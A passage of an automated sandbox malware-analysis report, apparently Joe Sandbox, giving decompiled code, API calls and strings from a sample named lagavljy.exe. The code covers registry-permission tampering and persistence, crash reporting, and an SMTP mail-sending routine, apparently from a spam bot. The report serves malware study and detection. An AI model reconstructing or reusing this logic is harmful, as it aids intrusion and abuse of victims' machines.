								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x1
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544(0x4122f8, 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}

0x00407aae
0x00407ab4
0x00407ab7
0x00407ac2
0x00000000
0x00407ac4
0x00407adc
0x00407adf
0x00407ae5
0x00407ae7
0x00407da7
0x00407daa
0x00000000
0x00407aed
0x00407b0c
0x00407b13
0x00407b16
0x00407b1c
0x00407b1e
0x00000000
0x00000000
0x00407b34
0x00407b3b
0x00407b41
0x00407b43
0x00000000
0x00000000
0x00407b59
0x00407b5f
0x00407b61
0x00407bb8
0x00407bcb
0x00407bce
0x00407bd4
0x00407bd6
0x00407da6
0x00000000
0x00407da6
0x00407bdc
0x00407bdf
0x00407be1
0x00000000
0x00000000
0x00407be9
0x00407beb
0x00407bee
0x00407bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x00407bf8
0x00407bf8
0x00407c00
0x00407c06
0x00407c08
0x00407cc6
0x00407cc6
0x00407cc6
0x00407cc6
0x00000000
0x00407cc6
0x00407c14
0x00407c16
0x00407c19
0x00407c1b
0x00407c4f
0x00407c4f
0x00407c52
0x00407c57
0x00407c5e
0x00407c5e
0x00407c5e
0x00407c66
0x00407c6c
0x00407c6f
0x00407c71
0x00407c86
0x00407c73
0x00407c78
0x00407c7f
0x00407c7f
0x00407c8b
0x00407c8e
0x00407c90
0x00407c93
0x00407c96
0x00407c96
0x00407c9d
0x00407c9f
0x00407ca7
0x00407ca7
0x00407ca9
0x00407cac
0x00407cb2
0x00407cb2
0x00407cb5
0x00407cc3
0x00000000
0x00407ca1
0x00407ca1
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407ca5
0x00000000
0x00000000
0x00000000
0x00407c1d
0x00407c1d
0x00407c27
0x00407c2d
0x00407c2f
0x00000000
0x00000000
0x00407c31
0x00407c32
0x00407c34
0x00000000
0x00000000
0x00000000
0x00407c34
0x00407c36
0x00407c38
0x00000000
0x00000000
0x00407c40
0x00407c46
0x00407cc9
0x00407cc9
0x00407cd0
0x00407cd0
0x00407cd9
0x00407cdc
0x00000000
0x00000000
0x00407ce2
0x00407ce8
0x00407d5a
0x00407d61
0x00407d6a
0x00407d6c
0x00407d6e
0x00407d72
0x00407d78
0x00407d7a
0x00407d82
0x00407d88
0x00407d8a
0x00407d92
0x00407d98
0x00407d9a
0x00407d9c
0x00407d9c
0x00407d9a
0x00407d8a
0x00407da0
0x00407da0
0x00000000
0x00407d6e
0x00407cea
0x00407cf0
0x00000000
0x00000000
0x00407cff
0x00407d05
0x00407d0b
0x00407d0d
0x00000000
0x00000000
0x00407d0f
0x00407d14
0x00407d16
0x00407d19
0x00407d19
0x00407d1b
0x00407d1c
0x00407d1c
0x00407d4a
0x00407d50
0x00407d52
0x00407d54
0x00407d54
0x00000000
0x00407d52
0x00407b6a
0x00407b70
0x00407b72
0x00000000
0x00000000
0x00407b7b
0x00407b84
0x00407b86
0x00407b88
0x00407b8c
0x00407b92
0x00407b94
0x00407b9c
0x00407ba2
0x00407ba4
0x00407bab
0x00407bab
0x00407ba4
0x00407bb2
0x00407bb2
0x00000000
0x00407b88

APIs

RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
RtlEncodePointer.NTDLL(00000000), ref: 00407B8C
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
LocalFree.KERNEL32(00000000), ref: 00407BB2
GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE

Strings

D, xrefs: 00407B0C
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00407CE2, 00407D0F, 00407D23, 00407D24

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEncodeEqualFreeLookupOpenPointerUser
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe$D
API String ID: 127100002-1954293302
Opcode ID: 3ec8af033fe1f594e24f96e4e5a24a1b59b9dd27cd2a73636fe0172ee341a0d8
Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
Opcode Fuzzy Hash: 3ec8af033fe1f594e24f96e4e5a24a1b59b9dd27cd2a73636fe0172ee341a0d8
Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00477CE5, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 00477D0A
GetUserNameA.ADVAPI32(?,?), ref: 00477D2F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00477D66
RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 00477D8B
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00477DA9
EqualSid.ADVAPI32(?,?), ref: 00477DBA
LocalAlloc.KERNEL32(00000040,00000014), ref: 00477DCE
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00477DDC
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00477DEC
RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 00477DFB
LocalFree.KERNEL32(00000000), ref: 00477E02
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00477E1E

Strings

D, xrefs: 00477D5C
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00477F32, 00477F5F, 00477F73, 00477F74

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe$D
API String ID: 2976863881-1954293302
Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
Instruction ID: 6884c1775e5fe54464484a5c1b4d4059b92b2f98e3fc5db3bf0cb0f70e1d4728
Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
Instruction Fuzzy Hash: 29A14371904219AFDF118FA1DD48FEFBBB9FB08304F54806AF505E6250D7798A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00406511, Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}

APIs

wsprintfA.USER32 ref: 0040654D
IsBadReadPtr.KERNEL32(?,00000008), ref: 0040655C
htonl.WS2_32(?), ref: 00406578
htonl.WS2_32(?), ref: 00406587
wsprintfA.USER32 ref: 0040659B
wsprintfA.USER32 ref: 004065DC
wsprintfA.USER32 ref: 00406671
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040668A
StackWalk64.DBGHELP(0000014C,00000000), ref: 00406696
wsprintfA.USER32 ref: 004066B0
wsprintfA.USER32 ref: 004066E7
wsprintfA.USER32 ref: 004066FF
wsprintfA.USER32 ref: 0040671F
ExitProcess.KERNEL32 ref: 00406755

Strings

12:08:32, xrefs: 00406535
ret=%pp1=%pp2=%pp3=%pp4=%p, xrefs: 0040666B
%d=%p, xrefs: 004066F9
plgs:, xrefs: 004066AA
localcfg, xrefs: 0040672D
_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p, xrefs: 004065D6
except_info, xrefs: 00406728
va=%08X%08X uef=%p, xrefs: 00406595
Jan 13 2018, xrefs: 0040653A
ver=%d date=%s %sc=%08x a=%p, xrefs: 00406547

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
API String ID: 2400214276-165278494
Opcode ID: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
Instruction ID: d0bbb1ce902d37c6012dbda67fcae0275dd4f0eb650f6cdd038f268f1af807dd
Opcode Fuzzy Hash: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
Instruction Fuzzy Hash: FC615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7C1, Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				void* _t65;
				signed int _t68;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;
				signed int _t92;
				void* _t96;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed int _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0040EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0040EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0040EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x413668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x413630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x413634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x413638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0040A699( &_v1156,  *0x413634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0040A699( &_v1156,  *0x413638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														_t85 = E0040EE95( &_v1156, E0040A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0040A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}

0x0040a7cb
0x0040a7cf
0x0040a7cf
0x0040a7d3
0x0040a7d9
0x0040a87d
0x0040a87e
0x0040a886
0x0040a88d
0x0040a893
0x0040a897
0x0040a8bf
0x0040a8c2
0x0040a8f2
0x0040a8f2
0x0040a8f8
0x0040a8fa
0x0040a900
0x0040a906
0x0040a909
0x0040a90a
0x0040a978
0x0040a97c
0x0040a97e
0x0040a980
0x00000000
0x00000000
0x0040a912
0x0040a914
0x0040a91a
0x0040a9b9
0x0040a9c2
0x0040ab4a
0x0040ab4a
0x00000000
0x0040ab4a
0x0040a920
0x0040a924
0x0040a92c
0x0040a954
0x0040a95f
0x0040a966
0x0040a968
0x00000000
0x00000000
0x0040a96a
0x0040a96c
0x0040a96c
0x0040a96e
0x0040a970
0x0040a971
0x00000000
0x0040a971
0x0040a92e
0x0040a931
0x00000000
0x00000000
0x0040a940
0x0040a945
0x0040a948
0x0040a94c
0x0040a952
0x00000000
0x00000000
0x00000000
0x0040a952
0x0040a982
0x0040a985
0x0040a988
0x0040a89e
0x0040a89e
0x00000000
0x0040a89e
0x0040a98e
0x0040a991
0x0040a9d1
0x0040a993
0x0040a99f
0x0040a9a7
0x0040a9aa
0x0040a9aa
0x0040a9d8
0x0040a9db
0x0040ab39
0x0040ab41
0x0040ab48
0x00000000
0x0040a9e1
0x0040a9e1
0x0040a9e9
0x00000000
0x00000000
0x0040a9fb
0x0040a9fe
0x0040aa04
0x0040aa32
0x0040aa40
0x0040aa41
0x0040aa46
0x0040aa49
0x0040aa49
0x0040aa4d
0x0040aa52
0x0040aa54
0x0040aa54
0x0040aa57
0x0040aa68
0x0040aa68
0x0040aa6a
0x00000000
0x00000000
0x0040aa70
0x0040aa75
0x0040aa77
0x0040ab35
0x0040ab35
0x00000000
0x0040ab35
0x0040aa7d
0x0040aa83
0x00000000
0x00000000
0x0040aa89
0x0040aa8f
0x00000000
0x00000000
0x0040aa95
0x0040aa98
0x0040aab4
0x0040aac1
0x0040aac8
0x0040aaca
0x0040aadd
0x0040aae4
0x0040aae6
0x0040aaec
0x0040aaef
0x0040ab00
0x0040ab12
0x0040ab1a
0x0040ab29
0x0040ab31
0x0040ab33
0x00000000
0x00000000
0x00000000
0x0040ab33
0x0040aaf1
0x0040aaf4
0x00000000
0x00000000
0x0040aaf6
0x0040aaf9
0x00000000
0x00000000
0x0040aafb
0x0040aafe
0x00000000
0x00000000
0x00000000
0x0040aafe
0x0040aae8
0x00000000
0x0040aae8
0x0040aacc
0x0040aacc
0x00000000
0x0040aacc
0x0040aaa2
0x0040aaa9
0x0040aaab
0x00000000
0x00000000
0x0040aaad
0x00000000
0x0040aaad
0x0040aa59
0x0040aa5f
0x00000000
0x00000000
0x0040aa61
0x00000000
0x0040aa61
0x0040aa06
0x0040aa0c
0x00000000
0x00000000
0x0040aa0e
0x0040aa14
0x00000000
0x00000000
0x0040aa16
0x0040aa1c
0x00000000
0x00000000
0x0040aa1e
0x0040aa24
0x00000000
0x00000000
0x0040aa26
0x0040aa2c
0x00000000
0x00000000
0x0040aa2e
0x00000000
0x0040aa2e
0x0040a9db
0x0040a8c8
0x0040a8d2
0x0040a8d4
0x0040a8d6
0x00000000
0x00000000
0x0040a8e2
0x00000000
0x0040a8eb
0x0040a89c
0x0040a8af
0x0040a8b8
0x00000000
0x0040a8b8
0x00000000
0x0040a89c
0x0040a7df
0x00000000
0x00000000
0x00000000
0x0040a7ed
0x0040a7f0
0x0040a7f3
0x0040a803
0x0040a7f5
0x0040a7f5
0x0040a7f5
0x00000000
0x00000000
0x0040a845
0x0040a848
0x00000000
0x00000000
0x0040a852
0x0040a855
0x0040a84d
0x0040a84d
0x0040a7fa
0x0040a7fb
0x00000000
0x00000000
0x0040a85c
0x0040a85e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a86a
0x0040a86c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a80a
0x0040a80c
0x0040a871
0x0040a871
0x0040a874
0x0040a875
0x00000000
0x00000000
0x0040a813
0x0040a816
0x0040a816
0x0040a819
0x0040a819
0x0040a81b
0x0040a81c
0x0040a81c
0x00000000
0x00000000
0x0040a836
0x0040a839
0x0040a839
0x0040a83c
0x0040a83c
0x0040a83e
0x0040a83f
0x0040a83f
0x0040a820
0x0040a824
0x0040a82f
0x0040a87a
0x0040a87a
0x00000000
0x00000000

APIs

wsprintfA.USER32 ref: 0040A7FB
lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
